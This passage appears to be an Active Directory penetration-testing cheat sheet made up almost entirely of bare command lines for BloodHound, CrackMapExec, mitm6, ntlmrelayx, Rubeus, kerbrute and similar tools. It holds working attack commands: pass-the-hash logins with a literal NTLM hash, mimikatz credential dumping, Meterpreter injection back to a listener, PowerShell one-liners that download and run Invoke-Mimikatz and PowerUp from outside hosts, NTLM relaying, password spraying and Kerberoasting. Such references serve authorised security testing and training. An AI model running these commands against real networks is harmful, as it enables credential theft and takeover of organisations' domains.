Impacket or the Windows version
apt install bloodhound  # kali
neo4j console
Go to http://127.0.0.1:7474, use db: bolt://localhost:7687, user: neo4j, pass: neo4j
./bloodhound
SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb -SearchForest
SharpHound.exe --EncryptZip --ZipFilename export.zip
or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
crackmapexec mimikatz --server http --server-port 80
git clone https://github.com/fox-it/mitm6.git && cd mitm6
pip install .
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
Active Directory Assessment and Privilege Escalation Script
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
pingcastle.exe --healthcheck --server domain.local
pingcastle.exe --graph --server domain.local
pingcastle.exe --scanner scanner_name --server domain.local
Available scanners are: aclcheck, antivirus, corruptADDatabase, foreignusers, laps_bitlocker, localadmin, nullsession, nullsession-trust, share, smb, spooler, startup
./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid]
Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID]
Rubeus.exe klist [/luid:LOGINID]
Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV
Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD'
Install-Lab
Show-LabDeploymentSummary